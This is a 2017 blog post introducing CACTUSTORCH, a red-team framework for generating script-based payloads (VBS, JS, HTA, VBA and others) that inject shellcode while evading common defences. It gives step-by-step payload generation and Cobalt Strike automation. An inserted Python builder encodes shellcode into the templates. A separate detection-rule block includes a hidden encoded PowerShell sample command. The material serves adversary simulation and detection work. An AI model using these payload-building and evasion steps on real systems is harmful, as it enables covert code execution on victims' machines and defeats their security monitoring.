Payload Generation with CACTUSTORCH

Note: posted on June 2017

CACTUSTORCH is a payload generation framework for adversary simulation engagements, built on James Forshaw's DotNetToJScript tool. DotNetToJScript lets a C# (.NET) assembly be bootstrapped from inside a script payload, which gives a reliable means of bypassing many common defences. CACTUSTORCH currently supports the following payload types:

VBS

VBA

JS

JSE

WSF

HTA

VBE

Before this, shellcode injection could not be invoked directly from these script formats; the one exception was VBA macros (more on this later in the post). CACTUSTORCH ships a self-contained C# binary that accepts a target binary name and base64-encoded shellcode to inject. It also borrows from @armitagehacker's / Cobalt Strike's VBA macro injection the approach of selecting the 32-bit executable to inject into.

State of Current Payloads

Generation of payloads for the supported formats already exists in several frameworks, including Metasploit and Cobalt Strike. There are however some drawbacks to how these payloads are generated.

In the Metasploit Framework the relevant payload formats behave as follows:

VBS: File drop and execute. Touches disk.

HTA-PSH: Runs powershell.exe via a WScript.Shell object. Both powershell.exe and WScript.Shell are well known to blue teams.

HTA-VBA: Wraps a VBS that weakens the Office macro security settings, creates a COM object for Excel and injects VBA macro code containing Kernel32 API declarations. This requires Office to be installed, and the API declarations are a known signature.

Benefits of CACTUSTORCH

CACTUSTORCH offers a number of improvements over current payload generation that are beyond the capabilities of the public frameworks:

Does not use Kernel32 API declarations in the payload

Obfuscated within the C# binary

Allows for arbitrary specification of target binary to spawn.

Allows for arbitrary shellcode to be specified.

Does not spawn PowerShell.exe.

Does not require PowerShell.

Does not require Office.

Does not invoke WScript.Shell.

Does not require staging as the full stageless shellcode can be contained within the delivered payload.

No static parent-to-child spawn: the user can change what wscript.exe spawns. wscript.exe spawning powershell.exe is suspicious, whereas spawning rundll32.exe is arguably less indicative of compromise. You can change this to calc.exe, ping.exe /t or similar less suspicious binaries.
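The defender's side of that parent/child point, as an added example that is not part of the original post or of CACTUSTORCH: a small triage rule in Python over constructed Sysmon Event ID 1 style records (the records, their field layout and the severity labels are assumptions made for this example). It flags any process spawned by a script host, rates wscript.exe spawning powershell.exe as the chain the post says blue teams already know, and treats a rundll32.exe child with no `dll,Export` argument as still worth a look, since a legitimate rundll32 launch normally carries one (a heuristic of this example, not a claim the post makes).

```python
# Added example: triage of script-host parent/child chains over constructed
# Sysmon Event ID 1 style records. Not part of CACTUSTORCH or the original post.

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}

# Constructed sample telemetry (key=value fields, pipe separated); not real logs.
SAMPLE_EVENTS = [
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\wscript.exe"
    "|CommandLine=wscript.exe invoice.js",
    "ParentImage=C:\\Windows\\System32\\wscript.exe|Image=C:\\Windows\\SysWOW64\\rundll32.exe"
    "|CommandLine=rundll32.exe",
    "ParentImage=C:\\Windows\\System32\\wscript.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell -nop -w hidden -enc SQBFAFgA",
    "ParentImage=C:\\Windows\\System32\\services.exe|Image=C:\\Windows\\System32\\svchost.exe"
    "|CommandLine=svchost.exe -k netsvcs",
    "ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\rundll32.exe"
    "|CommandLine=rundll32.exe shell32.dll,Control_RunDLL",
]


def parse_event(line):
    """Split one 'Key=Value|Key=Value' record into a dict."""
    return dict(field.split("=", 1) for field in line.split("|"))


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Severity for one event, or None when the parent is not a script host."""
    parent = basename(event["ParentImage"])
    child = basename(event["Image"])
    cmd = event.get("CommandLine", "").strip()
    if parent not in SCRIPT_HOSTS:
        return None
    if child == "powershell.exe":
        # The chain the post says is already well known to blue teams.
        return "high"
    if child == "rundll32.exe":
        # Heuristic (assumption of this example): a normal rundll32 launch
        # names "dll,Export"; a bare rundll32.exe child is a sacrificial host.
        args = cmd.split(None, 1)[1] if " " in cmd else ""
        return "medium" if "," not in args else "low"
    # Any other child of a script host (calc.exe, ping.exe, ...) is still logged.
    return "low"


def triage(lines):
    """Return (severity, child image, command line) for each flagged record."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        sev = classify(ev)
        if sev is not None:
            hits.append((sev, basename(ev["Image"]), ev.get("CommandLine", "")))
    return hits


if __name__ == "__main__":
    for sev, child, cmd in triage(SAMPLE_EVENTS):
        print("%-6s %-15s %s" % (sev, child, cmd))
```

The point of the "low" bucket is that swapping powershell.exe for calc.exe or ping.exe only lowers the score of a single rule; the script-host-to-child relationship itself is still there to be keyed on.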

Using CACTUSTORCH

Using CACTUSTORCH is relatively straightforward; the following steps generate a custom payload:

Select the payload format you want to use from the cloned directory.

Select the binary to inject into. It has to exist in both SysWOW64 and System32, as the 32-bit copy is the one that gets spawned.

Generate raw shellcode for your listener and base64-encode it on a single line:

$> cat payload.bin | base64 -w 0 > out.txt

Copy the base64 payload from out.txt into the "code" variable of the template.

For VBA, run out.txt through the splitter first: vbasplit.py out.txt split.txt

Then copy split.txt into the highlighted code section of the VBA template. The payload is ready.

Apply obfuscation if you want.
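The steps above carried through as an added example in Python (not code from the original post and not CACTUSTORCH's own scripts): the shellcode is deterministic filler bytes, the template line `var code = "";` is an assumed placeholder, and the VBA split layout is this example's own rendering of what vbasplit.py achieves, based on the fact that a VBA source line cannot exceed 1023 characters, so it need not match that script byte for byte. It also adds the two checks worth running before pasting: that the chosen target binary exists under both System32 and SysWOW64, and that the split VBA reassembles and decodes back to the original shellcode.

```python
# Added example: build a CACTUSTORCH-style payload from raw shellcode.
# Not part of the original post or the CACTUSTORCH repository.
import base64
import os
import re

# Constructed stand-in for payload.bin: deterministic filler, NOT executable code.
SAMPLE_SHELLCODE = bytes(range(256)) * 8  # 2048 bytes

# Assumed template fragment: the "code" variable holds an empty string literal.
JS_TEMPLATE = 'var binary = "rundll32.exe";\nvar code = "";\n// loader omitted\n'

# A VBA source line is limited to 1023 characters, so the blob is rebuilt as a
# chain of short "code = code & ..." statements instead of one giant literal.
VBA_CHUNK = 200
VBA_MAX_LINE = 1023


def encode_shellcode(raw):
    """Same output as `cat payload.bin | base64 -w 0`: one line, no wrapping."""
    return base64.b64encode(raw).decode("ascii")


def fill_template(template, b64, var="code"):
    """Paste the blob into the template's empty `var code = "";` literal."""
    pattern = re.compile(r'(var\s+%s\s*=\s*")("\s*;)' % re.escape(var))
    filled, n = pattern.subn(lambda m: m.group(1) + b64 + m.group(2), template, count=1)
    if n != 1:
        raise ValueError("template has no empty %r literal" % var)
    return filled


def split_for_vba(b64, var="code", chunk=VBA_CHUNK):
    """Emit VBA that rebuilds the blob by concatenation, one chunk per line
    (the same idea as vbasplit.py; the exact layout is this example's own)."""
    pieces = [b64[i:i + chunk] for i in range(0, len(b64), chunk)]
    lines = ['%s = "%s"' % (var, pieces[0])]
    lines += ['%s = %s & "%s"' % (var, var, p) for p in pieces[1:]]
    return "\n".join(lines)


def reassemble_vba(vba, var="code"):
    """Parse the generated VBA back into one base64 string for verification."""
    v = re.escape(var)
    line_re = re.compile(r'%s = (?:%s & )?"([A-Za-z0-9+/=]*)"' % (v, v))
    parts = []
    for line in vba.splitlines():
        m = line_re.fullmatch(line)
        if not m:
            raise ValueError("unexpected VBA line: " + line)
        parts.append(m.group(1))
    return "".join(parts)


def vba_is_sane(vba, raw):
    """Pre-paste check: no over-long line, and the concatenated literal decodes
    back to the original shellcode byte for byte."""
    if any(len(line) > VBA_MAX_LINE for line in vba.splitlines()):
        return False
    return base64.b64decode(reassemble_vba(vba)) == raw


def target_present(binary, roots=(r"C:\Windows\System32", r"C:\Windows\SysWOW64")):
    """The injection target must exist under both System32 and SysWOW64."""
    return all(os.path.isfile(os.path.join(root, binary)) for root in roots)


if __name__ == "__main__":
    b64 = encode_shellcode(SAMPLE_SHELLCODE)
    print(fill_template(JS_TEMPLATE, b64)[:100] + "...")
    vba = split_for_vba(b64)
    print("VBA statements:", len(vba.splitlines()))
    print("VBA split verified:", vba_is_sane(vba, SAMPLE_SHELLCODE))
    print("rundll32.exe present in both dirs:", target_present("rundll32.exe"))
```

Run it on a Windows host to get a meaningful answer from target_present; elsewhere it simply reports False. The round trip in vba_is_sane is the check that matters most in practice, because a chunk boundary that drops or duplicates a character yields a payload that silently fails to decode in the target.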

A video demonstrating these steps is shown below:

Integration with Cobalt Strike

As part of streamlining adversary simulation engagements so that more time can be spent on creating more sophisticated and bespoke attacks, Vincent has created a CACTUSTORCH aggressor script to automate this.

After loading the aggressor script, the following menu is presented as an option under the "Attack" tab. Select the payload type and options you want, and the script generates the payload and hosts it for you. For VBA, the code is presented in a textbox from which it can be copied and pasted into a Word VBA macro.

The aggressor script is demonstrated in the following video:

Credits

The scripts, proofs of concept and aggressor script add-on were created by Vincent Yiu. We would also like to thank the following people for their contributions: